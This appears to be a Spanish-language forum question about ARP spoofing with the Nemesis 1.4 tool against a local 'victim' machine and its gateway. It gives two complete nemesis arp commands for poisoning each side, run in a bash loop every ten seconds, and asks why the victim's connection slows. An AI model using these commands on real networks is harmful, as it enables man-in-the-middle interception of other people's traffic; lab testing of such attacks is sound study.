He estado usando Nemesis 1.4 para probar la falsificación de ARP en una máquina víctima local. He estado falsificando tanto la máquina víctima como la puerta de enlace predeterminada para redirigir ARP a mi máquina.
Fuente de la víctima falsa MAC:
sudo nemesis arp -v -r -d eth0 -S [victim IP] -D [default gateway IP] \
-h [my system MAC] -m [gateway MAC] -H [my MAC] -M [gateway MAC]
Spoofing gateways MAC:
sudo nemesis arp -v -r -d eth0 -S [gateway IP] -D [victim IP] \
-h [my system MAC] -m [victim MAC] -H [my MAC] -M [victim MAC]
Luego, se realiza un BASH en bucle y comienza la redirección ARP, falsificando cada 10 segundos. En tcpdump puedo ver las respuestas de ARP que salen, y parece estar funcionando. Pero una vez en la máquina de las víctimas, la conexión a Internet de repente se vuelve dolorosamente lenta, si es que funciona. ¿Nemesis no está redirigiendo? Si es así, ¿qué estoy haciendo mal?